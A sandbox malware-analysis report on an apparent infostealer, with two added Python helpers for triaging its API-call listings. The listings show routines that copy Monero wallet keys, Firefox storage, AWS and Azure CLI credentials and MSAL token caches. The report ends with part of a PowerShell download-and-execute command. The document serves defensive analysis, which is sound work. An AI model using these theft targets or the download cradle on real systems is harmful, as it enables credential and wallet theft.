                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                   Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: ff70f295fe52079f4fcbe2dde9f19ecba497e3b8cc3c68b7c3e48ddb7985cc13
                                  • Instruction ID: a8a3bb8376f2ecbeabeaaea3d54e102285aff2541201ba045502757059bcd6c1
                                  • Opcode Fuzzy Hash: ff70f295fe52079f4fcbe2dde9f19ecba497e3b8cc3c68b7c3e48ddb7985cc13
                                  • Instruction Fuzzy Hash: 23B18D71A112069BCB27AF74DC49EAF77E8AF14305F454024FC49EB261DB34EC999BA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003557D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00355804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00355868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003558C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003558D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003558F8
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00355961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355988
                                  • lstrlen.KERNEL32(00371794), ref: 0035599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003559B9
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 003559C5
                                  • lstrlen.KERNEL32(00FAC578), ref: 003559D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003559F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00355A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00355A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355BB5
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00355BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355C70
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                   Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: bc0aa8d43265707369c574b4cf5ee503dc2706daa952672a23977eb636616825
                                  • Instruction ID: 17a305b355640a5282dc0c5fa299845cd4224e2f9ec5f7b7d3febe8e0465f36e
                                  • Opcode Fuzzy Hash: bc0aa8d43265707369c574b4cf5ee503dc2706daa952672a23977eb636616825
                                  • Instruction Fuzzy Hash: 6202B271A116059BCB23EF68D899EAF7BF5AF54301F454128FC45AB260DB34EC49CBA0
                                  APIs
                                    • Part of subcall function 00341120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00341135
                                    • Part of subcall function 00341120: RtlAllocateHeap.NTDLL(00000000), ref: 0034113C
                                    • Part of subcall function 00341120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00341159
                                    • Part of subcall function 00341120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00341173
                                    • Part of subcall function 00341120: RegCloseKey.ADVAPI32(?), ref: 0034117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 003411C0
                                  • lstrlen.KERNEL32(?), ref: 003411CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 003411E8
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034121F
                                  • lstrlen.KERNEL32(00FA8858), ref: 0034122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341251
                                  • lstrcat.KERNEL32(00000000,00FA8858), ref: 00341259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00341264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00341294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003412BA
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003412FF
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0034130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341335
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341378
                                  • lstrcat.KERNEL32(00000000), ref: 00341385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003413AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003413D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034143D
                                    • Part of subcall function 0035EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0035EE12
                                  • DeleteFileA.KERNEL32(?), ref: 00341471
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                   Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: 6a41228ec8bcb6b28c2794f32014a57f10854a91bb348b36950c596f6b92dfca
                                  • Instruction ID: 4892a6496a01b4ae195400583207d81bbb174e2661b2b651ed3d40fe1e1925dc
                                  • Opcode Fuzzy Hash: 6a41228ec8bcb6b28c2794f32014a57f10854a91bb348b36950c596f6b92dfca
                                  • Instruction Fuzzy Hash: 5BA16071A10606ABCB22EF64DC89AAF77F9AF54300F454424F909EF251DB30ED959BA0
                                  APIs
                                  • memset.MSVCRT ref: 0035E740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0035E769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 0035E7C6
                                  • memset.MSVCRT ref: 0035E805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0035E82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 0035E886
                                  • memset.MSVCRT ref: 0035E8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0035E8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E920
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0035E947
                                  • memset.MSVCRT ref: 0035E986
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                   Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: 43f5029d335d8887ecc763c024e9a60a26eb442c497add5bad0f50371c32f8fe
                                  • Instruction ID: 5e0b0715756bda8dc2c3c46ad5c13568126b77a27ce326b61a2ec1dd428d3574
                                  • Opcode Fuzzy Hash: 43f5029d335d8887ecc763c024e9a60a26eb442c497add5bad0f50371c32f8fe
                                  • Instruction Fuzzy Hash: AC711B71E50219ABDB26EB64DC4AFED7774AF48700F404494FA19AF180DF70AF888B64
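The listings above are the sample's file-collection routines, and they all follow one shape: resolve a base folder with SHGetFolderPathA (the second argument is a CSIDL: 0x1A is CSIDL_APPDATA, 0x1C is CSIDL_LOCAL_APPDATA, 0x28 is CSIDL_PROFILE; the `\..\` string in the 0x1A routine steps from Roaming up to its parent), append a fixed fragment with lstrcpy/lstrcat, probe it with GetFileAttributesA or a FindNextFileA loop, then CopyFileA with bFailIfExists set (third argument 00000001) and, later in the same function, DeleteFileA. The Monero routine differs only in where the path comes from: RegOpenKeyExA on 0x80000001 (HKEY_CURRENT_USER) `SOFTWARE\monero-project\monero-core` with 0x20119 (KEY_READ | KEY_WOW64_64KEY), RegQueryValueExA of `wallet_path`, then `.keys` appended, with `\Monero\wallet.keys` as the fallback. The Python below is an added triage helper, not Joe Sandbox or Stealc code: it parses these API listings, resolves the CSIDL argument and collects per function the literal strings the plugin recovered. The sample input is a constructed excerpt of two of the listings on this page; the CSIDL table covers only the values that appear here, and anything else is reported as raw hex rather than guessed.

```python
"""Added triage helper (not Joe Sandbox or Stealc code): summarise what each
file-collection routine in a Joe Sandbox IDA-plugin API listing targets."""
import re

# CSIDL values (shlobj.h) seen as the 2nd argument of SHGetFolderPathA on this page.
CSIDL = {0x1A: "%APPDATA%", 0x1C: "%LOCALAPPDATA%", 0x28: "%USERPROFILE%"}

# Calls that touch the file system or registry; lstrcpy/lstrcat/lstrlen only build paths.
FILE_OPS = {"SHGetFolderPathA", "GetFileAttributesA", "FindFirstFileA", "FindNextFileA",
            "CopyFileA", "DeleteFileA", "RegOpenKeyExA", "RegQueryValueExA"}

# One call per bullet as the plugin prints it: optional "Part of subcall function X:"
# prefix, api.MODULE, optional (arg,arg,...) list, then "ref: addr".
CALL_RE = re.compile(
    r"^(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")   # pointer/number the plugin could not resolve


def parse_call(line):
    """(is_subcall, api, args, ref) for one bullet line, or None if it is not a call."""
    m = CALL_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    args = [a for a in (m.group("args") or "").split(",") if a]
    return bool(m.group("sub")), m.group("api"), args, m.group("ref")


def split_blocks(report):
    """Yield the lines of each 'APIs' section, up to the next one."""
    block = None
    for line in report.splitlines():
        s = line.strip()
        if s == "APIs":
            if block:
                yield block
            block = []
        elif block is not None:
            block.append(s)
    if block:
        yield block


def _add(lst, item):
    if item not in lst:
        lst.append(item)


def summarise(report):
    """One dict per function: first address, resolved folders, literal strings, ops."""
    out = []
    for block in split_blocks(report):
        e = {"ref": None, "folders": [], "strings": [], "ops": []}
        for line in block:
            if line.lstrip("• ").startswith("String ID:"):
                # '$'-separated strings the plugin tied to the function that never
                # appeared as a call argument (e.g. msal.cache, *.*)
                for s in line.split(":", 1)[1].split("$"):
                    if s.strip():
                        _add(e["strings"], s.strip())
                continue
            call = parse_call(line)
            if not call:
                continue          # headings, dump metadata, hashes
            sub, api, args, ref = call
            if not sub and e["ref"] is None:
                e["ref"] = ref
            if api == "SHGetFolderPathA" and len(args) > 1 and HEX8.match(args[1]):
                n = int(args[1], 16)
                _add(e["folders"], CSIDL.get(n, "CSIDL 0x%02X" % n))
            if api in FILE_OPS:
                _add(e["ops"], api)
            for a in args:
                if a != "?" and not HEX8.match(a):   # literal recovered from .rdata
                    _add(e["strings"], a)
        out.append(e)
    return out


# Constructed input: an excerpt of two of the listings above (Monero wallet and
# cloud-CLI credential routines), with non-call lines the parser has to skip.
SAMPLE = r"""
APIs
  • Part of subcall function 00341120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00341159
  • Part of subcall function 00341120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00341173
• lstrcat.KERNEL32(?,.keys), ref: 003411E8
• lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00341294
• CopyFileA.KERNEL32(?,?,00000001), ref: 003413D5
• DeleteFileA.KERNEL32(?), ref: 00341471
Memory Dump Source
• String ID: .keys$\Monero\wallet.keys
APIs
• memset.MSVCRT ref: 0035E740
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0035E769
• lstrcat.KERNEL32(?,\.aws\), ref: 0035E886
• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0035E8F1
• lstrcat.KERNEL32(?,\.IdentityService\), ref: 0035E947
• String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
"""

if __name__ == "__main__":
    print(*summarise(SAMPLE), sep="\n")
```

Run on the full report text, the helper turns each listing into a short line an analyst can read at a glance: the Monero entry shows the registry pair plus `.keys` and `\Monero\wallet.keys`; the 0x1C entry with `\storage\default\` and `.metadata-v2` is the on-disk layout of a Firefox profile's IndexedDB storage; `\.aws\` and `\.azure\` under %USERPROFILE% are the AWS CLI and Azure CLI configuration directories; `\.IdentityService\` with `msal.cache` under %LOCALAPPDATA% is the MSAL token cache. Those identifications are the editor's reading of the strings, so the helper deliberately reports strings rather than labels. The `*.*` string in the last listing, combined with FindNextFileA in the earlier one, is the directory walk that copies everything under those folders, which is the behaviour to hunt for: a process reading those paths that is not the CLI tool that owns them.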
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 0035ABCF
                                  • lstrlen.KERNEL32(00FADA60), ref: 0035ABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035AC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035AC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035ACB7
                                  • lstrlen.KERNEL32(00374AD4), ref: 0035ACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035ACF3
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 0035ACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AD28
                                  • lstrlen.KERNEL32(00374AD4), ref: 0035AD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AD5C
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 0035AD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AD91
                                  • lstrlen.KERNEL32(00FAD988), ref: 0035ADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035ADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035ADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035AE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035AE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AE6F
                                  • lstrlen.KERNEL32(00000000), ref: 0035AE85
                                  • lstrcpy.KERNEL32(00000000,00FADA78), ref: 0035AEB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: aacd564f48f0427d810315655aba307280429ddd87f869747da9946798aaddd9
                                  • Instruction ID: 14b708b9eb1f39db93ad34625eda00606cb8655d3826d7a9986ddfc3ca670529
                                  • Opcode Fuzzy Hash: aacd564f48f0427d810315655aba307280429ddd87f869747da9946798aaddd9
                                  • Instruction Fuzzy Hash: A7B18F309109169BCB23EF64DC49AAF73F5AF04302F850524BC05EB260DB34ED59EBA1
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,003572A4), ref: 003647E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 003647FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0036480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0036481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 0036482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00364840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 00364851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 00364862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00364873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00364884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 00364895
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: ca704eadfeb2626a174b03e28bc7b92037a0ebe2bca3bac5961c1bfc2c3c8345
                                  • Instruction ID: f9c3229ef1a32d537014d4b0ce723680f6f26939fc7afa61e6e8d35f1a33eca5
                                  • Opcode Fuzzy Hash: ca704eadfeb2626a174b03e28bc7b92037a0ebe2bca3bac5961c1bfc2c3c8345
                                  • Instruction Fuzzy Hash: 1811B471DF1720ABDB259F74BC0DAA93ABCBA25706354481AF55DD2160DBF84088FB60
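The ws2_32 record above is the pattern behind the "Extensive use of GetProcAddress" signature: the sample loads ws2_32.dll at run time and resolves connect, WSAStartup, getaddrinfo, htons, WSACleanup, recv, socket, freeaddrinfo, closesocket and send by name, so the PE import table never mentions networking. The handle argument prints as 00000000 because it only exists at run time; the DLL has to be recovered from the preceding LoadLibraryA argument. The parser below is an added example, not code from the report: it reads the report's own APIs lines (only the RECORD text is copied from the page), rebuilds the hidden import table by attributing each GetProcAddress to the closest preceding LoadLibrary* call, and maps the result to a capability. The capability table is constructed and can be extended with the report's other resolver blocks.

```python
"""
Rebuild the run-time import table that a LoadLibraryA/GetProcAddress chain
hides from static analysis, from a Joe Sandbox "APIs" list.

Added example, not code from the report. RECORD is copied from the ws2_32
record above; the parser, attribution rule and capability table are added here.
"""
import re
from collections import OrderedDict

RECORD = """\
• LoadLibraryA.KERNEL32(ws2_32.dll,?,003572A4), ref: 003647E6
• GetProcAddress.KERNEL32(00000000,connect), ref: 003647FC
• GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0036480D
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0036481E
• GetProcAddress.KERNEL32(00000000,htons), ref: 0036482F
• GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00364840
• GetProcAddress.KERNEL32(00000000,recv), ref: 00364851
• GetProcAddress.KERNEL32(00000000,socket), ref: 00364862
• GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00364873
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 00364884
• GetProcAddress.KERNEL32(00000000,send), ref: 00364895
"""

# One "• Api.MODULE(args), ref: ADDR" line. The argument list is optional (some
# lines in the report have none); "Part of subcall function" prefixes are tolerated.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_calls(record: str) -> list:
    """Parse the APIs list into dicts in address order: the order the report
    prints, which for a straight-line resolver block is also call order."""
    calls = []
    for line in record.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
        })
    return sorted(calls, key=lambda c: c["ref"])


def resolved_imports(calls: list) -> "OrderedDict[str, list]":
    """Attribute each GetProcAddress to the DLL named by the closest preceding
    LoadLibrary* call. Returns {dll name (lower-case): [export, ...]}."""
    imports = OrderedDict()
    current = None
    for c in calls:
        if c["api"].startswith("LoadLibrary") and c["args"]:
            current = c["args"][0].lower()
            imports.setdefault(current, [])
        elif c["api"] == "GetProcAddress" and current is not None and len(c["args"]) >= 2:
            imports[current].append(c["args"][1])
    return imports


# (dll, exports that must all be present, what that combination buys the sample).
# Constructed table; extend it with the other resolver blocks in the report.
CAPABILITIES = [
    ("ws2_32.dll", {"WSAStartup", "getaddrinfo", "socket", "connect", "send", "recv"},
     "raw TCP client: name resolution plus connect/send/recv, a hand-rolled C2 or exfil channel"),
    ("wininet.dll", {"InternetOpenA", "InternetOpenUrlA"}, "HTTP client via WinINet"),
    ("crypt32.dll", {"CryptUnprotectData"}, "DPAPI decryption of stored secrets"),
]


def infer_capabilities(imports) -> list:
    return [meaning for dll, needed, meaning in CAPABILITIES
            if needed <= set(imports.get(dll, []))]


if __name__ == "__main__":
    imports = resolved_imports(parse_calls(RECORD))
    for dll, exports in imports.items():
        print(f"{dll}: {', '.join(exports)}")
    for cap in infer_capabilities(imports):
        print("capability:", cap)
```

The attribution rule is a heuristic for straight-line code: if a resolver block loads two DLLs and interleaves their lookups, the ref addresses still order the calls correctly, but a handle stored and reused far later would be mis-attributed.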
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035BE53
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035BE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0035BE91
